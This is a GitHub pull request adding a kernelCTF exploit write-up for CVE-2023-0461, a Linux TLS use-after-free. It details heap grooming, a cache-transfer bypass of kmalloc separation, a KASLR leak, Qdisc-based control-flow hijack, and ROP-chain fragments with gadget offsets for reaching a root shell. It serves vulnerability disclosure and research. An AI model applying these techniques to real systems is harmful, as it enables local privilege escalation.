Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

kernelCTF: add CVE-2023-0461_mitigation #31

Merged
merged 8 commits into from
Aug 24, 2023
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
208 changes: 208 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,208 @@
# Attacking Objects

- **Heap grooming**: cbq_class + pfifo Qdisc [kmalloc-512]
- **Cache transfer**: fqdir (bucket_table pointer) [UAF from kmalloc-512 to dyn-kmalloc-1k]
- **Information leak/KASLR bypass**: user_key_payload + tbf Qdisc (tbf_qdisc_ops) [dyn-kmalloc-1k]
- **RIP control**: tbf Qdisc (RIP hijacked via qdisc->enqueue()) [dyn-kmalloc-1k]

# TL;DR

Transfer exploitation primitives from a fixed to a dynamic cache exploiting fqdir objects to cause a Use-After-Free in dyn-kmalloc-1k from kmalloc-512.

Once in the dynamic cache, corrupt a user_key_payload structure with a Qdisc object and leak the tbf_qdisc_ops pointer to bypass KASLR.

Finally, corrupt the Qdisc structure and send data to the respective network interface to hijack control flow when packets are enqueued.

# Overview

PS: This exploit originally targeted the `mitigation-6.1-broken` instance, it was later slightly modified to work on `mitigation-6.1-v2`.
The technique used to compromise both instances remains the same.

---

In the Linux kernel, there are multiple objects allocated in fixed caches that contain pointers to other structures allocated in dynamic caches.

The [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) structure, [allocated](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L186) in kmalloc-512 when a new network namespace [is initialized](https://elixir.bootlin.com/linux/v6.1/source/net/core/net_namespace.c#L332), with its [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointer (`fqdir->rhashtable.tbl`), allocated in dyn-kmalloc-1k ([fqdir_init()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L195) -> [rhashtable_init()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1015) -> [bucket_table_alloc()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L175)), is an example.

```c
/* Per netns frag queues directory */
struct fqdir {
/* sysctls */
long high_thresh;
long low_thresh;
int timeout;
int max_dist;
struct inet_frags *f;
struct net *net;
bool dead;
struct rhashtable rhashtable ____cacheline_aligned_in_smp; // ***

/* Keep atomic mem on separate cachelines in structs that include it */
atomic_long_t mem ____cacheline_aligned_in_smp;
struct work_struct destroy_work;
struct llist_node free_list;
};

struct rhashtable {
struct bucket_table __rcu *tbl; // ***
unsigned int key_len;
unsigned int max_elems;
struct rhashtable_params p;
bool rhlist;
struct work_struct run_work;
struct mutex mutex;
spinlock_t lock;
atomic_t nelems;
};

struct bucket_table {
unsigned int size;
unsigned int nest;
u32 hash_rnd;
struct list_head walkers;
struct rcu_head rcu;
struct bucket_table __rcu *future_tbl;
struct lockdep_map dep_map;
struct rhash_lock_head __rcu *buckets[] ____cacheline_aligned_in_smp;
};
```

The idea behind the technique used in this exploit, is that corrupting these kind of objects in a fixed cache utilizing a slab-use-after-free/double-free or a slab-out-of-bounds, it is possible to transfer exploitation primitives from a fixed to a dynamic cache, bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE.

Once in the dynamic cache, elastic objects can be "unlocked" to complete the exploitation process. In this writeup I refer to this attack as cache transfer.

# Exploit Analysis

The exploit consists of three stages:

- Cache transfer (UAF from kmalloc-512 to dyn-kmalloc-1k)
- KASLR bypass (in dyn-kmalloc-1k)
- RIP-control (in dyn-kmalloc-1k)

## Cache Transfer
After initializing some dummy network interfaces and some heap grooming in kmalloc-512 utilizing [cbq_class](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L71) and pfifo [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) objects, both allocated by [cbq_change_class()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1394) ([1](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1527), [2](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551)) when a new cbq traffic class is created, I exploited [CVE-2023-0461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461) to make the [icsk_ulp_data](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_connection_sock.h#L99) pointers of two sockets point to the same [tls_context](https://elixir.bootlin.com/linux/v6.1/source/include/net/tls.h#L235) in kmalloc-512.

Freeing one of the sockets, the tls_context structure was also freed, so I could cause a Use-After-Free as the icsk_ulp_data pointer of the other socket was still pointing to the freed object. (Step 1.0 in exploit.c)

I proceeded by replacing the freed tls_context in kmalloc-512 with a fqdir structure, this way, freeing the second socket I could arbitrarily free the fqdir object. (Step 1.1 in exploit.c)

In the next step, I exploited the Use-After-Free spraying fqdir again. This time my goal was to overlap another fqdir to the one just freed, making their bucket_table pointers point to the same table in dyn-kmalloc-1k. (Step 1.2 in exploit.c)

At this point, freeing one of the overlapped objects, the shared bucket_table was also freed ([fqdir_exit()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L218) -> [fqdir_work_fn()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L176) -> [rhashtable_free_and_destroy()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1130) -> [bucket_table_free()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L109)), so I could cause a Use-After-Free in dyn-kmalloc-1k as the bucket_table pointer of the other fqdir was still pointing to the freed table. (Step 1.3 in exploit.c)

Now I only had to replace the freed table with a [user_key_payload](https://elixir.bootlin.com/linux/v6.1/source/include/keys/user-type.h#L27) structure, then, freeing the second fqdir, I could arbitrarily free the user key and complete the cache transfer. (Step 1.4 - 1.5 in exploit.c)

```c
struct user_key_payload {
struct rcu_head rcu;
unsigned short datalen; // ***
char data[] __aligned(__alignof__(u64)); // ***
};
```

## KASLR Bypass

Once in dyn-kmalloc-1k, I overlapped the freed key with a tbf [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structure (allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938)), overwriting the key size with Qdisc.flags (0x10) and the first qword of the key payload with Qdisc.ops, `tbf_qdisc_ops` in this case. (Step 2.0 in exploit.c)

```c
struct Qdisc {
int (*enqueue)(struct sk_buff *skb,
struct Qdisc *sch,
struct sk_buff **to_free); // ***
struct sk_buff * (*dequeue)(struct Qdisc *sch);
unsigned int flags; // ***
u32 limit;
const struct Qdisc_ops *ops; // ***
struct qdisc_size_table __rcu *stab;
struct hlist_node hash;
u32 handle;
u32 parent;

struct netdev_queue *dev_queue;

struct net_rate_estimator __rcu *rate_est;
struct gnet_stats_basic_sync __percpu *cpu_bstats;
struct gnet_stats_queue __percpu *cpu_qstats;
int pad;
refcount_t refcnt;

/*
* For performance sake on SMP, we put highly modified fields at the end
*/
struct sk_buff_head gso_skb ____cacheline_aligned_in_smp;
struct qdisc_skb_head q;
struct gnet_stats_basic_sync bstats;
struct gnet_stats_queue qstats;
unsigned long state;
unsigned long state2; /* must be written under qdisc spinlock */
struct Qdisc *next_sched;
struct sk_buff_head skb_bad_txq;

spinlock_t busylock ____cacheline_aligned_in_smp;
spinlock_t seqlock;

struct rcu_head rcu;
netdevice_tracker dev_tracker;
/* private data */
long privdata[] ____cacheline_aligned;
};
```

After corrupting the user key, I leaked the `tbf_qdisc_ops` pointer from the `Qdisc` structure so I could bypass KASLR. (Step 2.1 in exploit.c)

## RIP-Control

In the final steps, I freed all the keys in dyn-kmalloc-1k including the one corrupted by Qdisc, and I reallocated them, overwriting the Qdisc structure. I overwritten the `qdisc->enqueue()` function pointer with a stack pivot gadget storing the rest of the ROP-chain in the same chunk. (Step 3.0 - 3.1 in exploit.c)

Finally, I sent packets to the network interface to trigger the call to [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825), this way I could hijack control flow. (Step 3.2 in exploit.c)

Note that when `qdisc->enqueue()` is called, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk itself, where the ROP-chain was stored, so it is not necessary to leak a heap address / know the address of the corrupted chunk.

## Post-RIP

After hijacking control flow, two problems arose. Since `qdisc->enqueue()` is called in an atomic / RCU read-side critical section, when I returned to user space, instead of getting a root shell, the kernel panicked showing two error messages:

- `"Illegal context switch in RCU read-side critical section"`

- `"BUG: scheduling while atomic: [...]"`

Fortunately, I managed to bypass both of them.

To bypass "RCU read-side critical section", a write-what-where gadget was used in the ROP-chain to set `current->rcu_read_lock_nesting = 0`.

```c
// current = find_task_by_vpid(getpid())
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = getpid(); // pid
rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = 0x46c; // offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
rop[idx++] = 0; // 0
rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
```

To bypass "scheduling while atomic" instead, the kernel was tricked into believing that a oops was in progress setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to 1:

```c
// Bypass "schedule while atomic": set oops_in_progress = 1
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = 1; // 1
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
```

If `oops_in_progress` contains a non-zero value indeed, [__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will simply return without triggering any error, and we will be able to gracefully return to userspace.

# Additional information

mitigation-6.1-v2 update: After enabling the `KMALLOC_SPLIT_VARSIZE` mitigation and making some minor adjustments to the source code, the exploit reliability improved to about 80%, even though limited time was dedicated to this aspect.
This may at first seem paradoxical, but it is actually a side effect of separating objects into multiple caches, slabs tend to be less prone to noise, and this leads to increased stability.

Considering that my original exploit for this vulnerability for a system without experimental mitigations was only ~150 lines of code, did not require user namespaces, and was very stable, the experimental mitigations, despite being bypassed by the technique described above, are very effective and have successfully stopped many of my other exploitation strategies. I will probably cover some of these failed (but very interesting!) attempts on [my blog](https://syst3mfailure.io).
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
# Exploitation techniques

To my knowledge, the following exploitation techniques are not known/publicly-documented:

- **Cache transfer** (Mitigation bypass): In the Linux kernel, there are multiple structures allocated in fixed caches that contain pointers to other objects allocated in dynamic caches. These structures act as junction points between fixed and dynamic caches.

Corrupting this kind of objects it is possible to transfer exploitation primitives from a fixed to a dynamic cache bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE.

For example, for this submission, I exploited [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) objects and their [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointers to cause a Use-After-Free in dyn-kmalloc-1k from kmalloc-512 (See exploit.md/comments in exploit.c for more details). Once in the dynamic cache, I could "unlock" elastic objects to complete the exploitation process.

The technique can be generalized and applied in other fixed caches looking for objects with similar properties. In this case the exploited vulnerability was a Use-After-Free, but it is also possible to apply the technique exploiting Out-Of-Bounds-Write vulnerabilities (e.g. partially overwriting a pointer to an object in a dynamic cache, making it point to another object in the slab, and then tricking the kernel into freeing the wrong structure).


- **RIP-Control via Qdisc**: Overwriting the `enqueue()` function pointer of a Qdisc structure, it is possible to hijack control flow when packets are enqueued to the respective network interface by [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825).

A heap leak is not required because when control flow is hijacked, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk, where the ROP-chain was stored.

[Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structures, are allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938). The allocation size is determined by the size of the `private` flexible array. [Sometimes](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551) the Qdisc size can be determined at compile time, so this object is particularly interesting because it can be used to hijack control flow in both fixed and dynamic caches.

For this submission, I used the tbf packet scheduler with the [tbf_sched_data](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_tbf.c#L97) used as private field of a Qdisc, so the object was allocated in dyn-kmalloc-1k.


# Post-RIP

- Sometimes, after RIP control, exploits do not work because the ROP-chain is executed in an atomic context. In that case the kernel panics showing a "scheduling while atomic" message.

For example, in [this very interesting kCTF writeup](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/), Kylebot hijacked control flow utilizing timerfd_ctx objects, overwriting `timerfd_ctx->tmr.function`, but "scheduling while atomic" prevented him from getting a root shell, so he had to opt for another strategy.

To get around this problem, the kernel can be tricked into believing that a oops is in progress setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to a non-zero value. This way
[__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will return without triggering any error:

```c
// Bypass "schedule while atomic": set oops_in_progress = 1
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = 1; // 1
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
```

- Another similar problem arises when the ROP-chain is executed in a RCU read-side critical section. This problem can be easily bypassed setting `current->rcu_read_lock_nesting = 0`:

```c
// current = find_task_by_vpid(getpid())
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = getpid(); // pid
rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = 0x46c; // offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
rop[idx++] = 0; // 0
rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
- Requirements:
- Capabilities: No
- Kernel configuration: CONFIG_TLS or CONFIG_XFRM_ESPINTCP
- User namespaces required: No
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=734942cc4ea6478eed125af258da1bdbb4afe578 (tcp: ULP infrastructure)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2c02d41d71f90a5168391b6a5f2954112ba2307c (net/ulp: prevent ULP without clone op from entering the LISTEN status)
- Affected kernel versions: 4.13-rc1 - 6.2-rc3
- Affected component: net/tls
- Cause: Use-After-Free
- Syscall to disable: setsockopt TCP_ULP
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461
- Description:
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege. There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
exploit:
gcc -o exploit exploit.c -lkeyutils -O0 -static -s

0xdevil marked this conversation as resolved.
Show resolved Hide resolved
prerequisites:
sudo apt-get install libkeyutils-dev
run:
./exploit

clean:
rm exploit
Binary file not shown.
Loading
Loading